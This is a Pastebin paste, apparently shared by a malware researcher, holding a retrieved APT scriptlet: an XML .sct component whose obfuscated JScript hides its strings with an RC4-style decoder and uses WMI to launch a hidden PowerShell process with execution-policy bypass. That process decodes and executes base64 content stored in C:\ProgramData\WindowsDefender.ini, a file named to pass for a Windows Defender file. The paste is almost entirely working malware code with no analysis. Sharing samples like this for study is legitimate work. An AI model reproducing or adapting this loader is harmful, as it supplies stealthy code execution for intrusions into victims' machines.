Advertisement
dissectmalware

Retrieved Scriptlet for an APT attack

Apr 23rd, 2018
408
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="utf-8"?>
  2. <package>
  3.   <component
  4.     id="x">
  5.     <registration
  6.       description="x"
  7.       progid="x"
  8.       version="1.00"
  9.       remotable="True">
  10.       <script language="JScript"><![CDATA[
  11. var a=['K2d3wr0='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f3));var b=function(c,d){c=c-0x0;var e=a[c];if(b['FloEtK']===undefined){(function(){var f;try{var g=Function('return (function() '+'{}.constructor("return this")( )'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,s){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+s['charCodeAt'](A%s['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return w;};b['MXQoVI']=q;b['zRoKdr']={};b['FloEtK']=!![];}var C=b['zRoKdr'][c];if(C===undefined){if(b['NSVger']===undefined){b['NSVger']=!![];}e=b['MXQoVI'](e,d);b['zRoKdr'][c]=e;}else{e=C;}return e;};var cm='powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini))))';var w32ps=GetObject('winmgmts:')['Get']('Win32_ProcessStartup');w32ps['SpawnInstance_']();w32ps['ShowWindow']=0x0;var rtrnCode=GetObject('winmgmts:')['Get']('Win32_Process')['Create'](cm,b('0x0','t#b5'),w32ps,null);   
  12. ]]></script>
  13.     </registration>
  14.   </component>
  15. </package>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement